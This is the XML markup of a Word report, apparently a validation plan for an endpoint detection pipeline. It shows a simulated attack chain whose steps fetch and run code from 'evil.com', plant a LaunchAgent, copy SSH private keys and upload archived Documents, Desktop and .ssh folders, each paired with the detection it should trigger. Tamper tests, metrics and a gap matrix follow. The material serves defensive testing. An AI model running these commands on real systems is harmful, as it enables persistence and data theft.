      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aux &amp;&amp; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468D246" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44576B05" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected telemetry: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → 6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessSpawnProbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> events. Expected rules: APT Initial Access pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B1835E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09A435" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>echo '#!/bin/bash\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> evil.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beacon|bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' &gt; ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LaunchAgents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>com.update.plist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75ED7724" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>crontab -e  # Add reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200A3E1" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>cp ~/.ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_key_backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D9BB5B2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39964807" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected telemetry: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PersistenceGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LaunchAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CronJob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Expected rules: Persistence After Auth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555610A1" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8D364" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>czf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/data.tar.gz ~/Documents ~/Desktop ~/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70629A89" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST -F "file=@/tmp/data.tar.gz" http://evil.com/upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF799A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F78B7C6" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected telemetry: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tar+curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Expected rules: Data Exfil Spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352F14ED" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>8.2 Expected Telemetry at Each Layer</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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6"/>
        <w:gridCol w:w="3746"/>
        <w:gridCol w:w="3798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="5F2580C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1B2A4A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29473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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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5DD24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Expected Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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16DFD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Verification Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="425AEFE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AA537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Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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11508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5 auth failures, 1 success, 6 discovery, 3 persistence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0BCE2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Agent log output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1017DDE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388C1" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2214A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All events ACK=OK, no RETRY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3F12B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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bus_publish_total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metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1980EAF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9CF18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WAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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AD18A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Events with intact BLAKE2b chain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584B5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scripts/audit_wal_chain.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="293114E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3166C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Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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FD70C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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src_ip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gets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GeoIP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, evil.com gets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ThreatIntel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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9A87A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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enrichment_status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field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="609F4C6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ADD4B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Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8731D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Rules fire. Device risk &gt;80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51CD2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incidents table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="69BAF1A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1DF88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Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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94A63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SOC dashboard shows CRITICAL incident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7739C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/dashboard/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api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>/correlate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43D46BAE" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4733C2E9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>8.3 Tamper Tests</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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3"/>
        <w:gridCol w:w="2856"/>
        <w:gridCol w:w="4601"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="30307D4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1B2A4A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9302D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Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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9E56B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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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3271D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Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="51088D4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38674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Corrupt 1 byte in WAL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9F2AB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 xml:space="preserve">Hex edit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envelope_bytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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F84DC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27AE60"/>
              </w:rPr>
              <w:t>BLAKE2b mismatch → quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="6AA5E02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03D06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Remove WAL entry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1FF6B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 xml:space="preserve">DELETE FROM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wal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WHERE id=N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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0AFD2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27AE60"/>
              </w:rPr>
              <w:t>Chain break → quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="081FFF2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63D31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 xml:space="preserve">Modify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prev_sig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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68400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 xml:space="preserve">UPDATE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wal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SET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prev_sig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>=X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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2CFF1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27AE60"/>
              </w:rPr>
              <w:t>Verification fails → quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="219FBA8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C7A9F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Reorder entries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8FE79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Swap two rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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76A8E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27AE60"/>
              </w:rPr>
              <w:t xml:space="preserve">Both chain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7AE60"/>
              </w:rPr>
              <w:t>verifs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7AE60"/>
              </w:rPr>
              <w:t xml:space="preserve"> fail → quarantined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="240CB35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2B671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Replay event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DBCC7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INSERT with same idem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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0132D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27AE60"/>
              </w:rPr>
              <w:t>UNIQUE constraint → rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1C4A4DE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8CC2D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Replay with new idem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D9D56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INSERT same bytes, new idem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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9AE8E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E74C3C"/>
              </w:rPr>
              <w:t>ACCEPTED (GAP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="699BC9B2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18959AA4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 9: Hardening Metrics (Phase 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A4B69" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>9.1 Performance Baseline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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73"/>
        <w:gridCol w:w="2615"/>
        <w:gridCol w:w="3372"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="259FA2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1B2A4A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BE013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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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00614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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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60A8D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Measurement Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1DB262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B170A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Agent → WAL latency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FE075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&lt;500ms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2ABB6" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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ts_ns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delta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="40FF92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130FC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WAL write throughput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12A15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 xml:space="preserve">&gt;1000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evt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>/s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84F1B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SQLite insert rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7A2919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FB411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Chain verification cost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BB1BE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&lt;10ms/100 events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E7706" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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process_batch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timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="36FDD09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1CBFC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Enrichment overhead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B4469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&lt;5ms/event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C3D06" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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pipeline.enrich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>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="58AE4C7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820A6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Correlation latency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95A71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&lt;100ms/device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F8E98" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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evaluate_device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>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="57C6E6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92723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UI query latency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F2762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&lt;200ms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6A0E2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Flask request timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="625C175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4B136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Dropped event rate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F24C1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&lt;0.01%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1EC89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backlog enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="722BAB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74636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Quarantine rate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D398C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0% (normal)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55E9E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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quarantine_count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="104E4494" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A9AB6C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>9.2 Integrity Metrics</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="4212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="5B8EFD6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1B2A4A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216E9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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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5F031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Alert Threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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C51E8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Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0BFBE77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C6D9A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Chain breaks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57938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&gt;0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8561A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Immediate investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="68C1A5E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C30D3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Checksum mismatches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9F202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&gt;0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60B05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Data corruption alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4902703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6FFCF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Dead letter count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0A76D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&gt;10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3EAC6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Investigate parsing failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="71E01F8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8CAD8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Signature failures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AB5E1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&gt;0 (enforced)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06ADA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Block agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E26ABA7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93FA42" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 10: Complete Gap Matrix (Phase 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4B8F5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>10.1 P0 — Critical (Block Release)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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37"/>
        <w:gridCol w:w="2006"/>
        <w:gridCol w:w="3844"/>
        <w:gridCol w:w="2173"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="34BE112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1B2A4A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82F99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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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6DAF2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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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A5200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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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8ACE7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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="034F422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3F886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EB-01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22F34" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9C7C4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Authorization NOT enforced</w:t>
            </w:r>
          </w:p>
        </w:tc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17701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 xml:space="preserve">Any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mTLS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client publishes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="1A1F3EE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A5F8A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EB-02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FE48A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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F3D7A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Signature verification OFF</w:t>
            </w:r>
          </w:p>
        </w:tc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645C5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Unsigned events accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="730DF03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C0CF0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COR-01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9384E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Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1D3C9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19/26 rules have ZERO tests</w:t>
            </w:r>
          </w:p>
        </w:tc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6C2DA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Silent failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="38E856C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4A78B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CTX-01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C8997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Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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736B5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Database manager NO RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc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A70DB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Any user wipes DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
